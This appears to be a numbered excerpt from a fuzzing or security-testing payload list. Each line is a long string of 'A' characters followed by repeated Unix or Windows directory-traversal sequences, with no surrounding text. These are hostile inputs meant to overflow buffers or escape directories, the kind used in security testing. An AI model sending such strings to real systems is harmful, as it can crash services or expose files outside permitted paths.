282 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../
283 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../
284 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../
285 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../
286 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../
287 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\
288 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\
289 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\
290 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\
291 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\
292 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\
293 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\
294 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\
295 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../
296 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../
297 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../
298 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../
299 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../
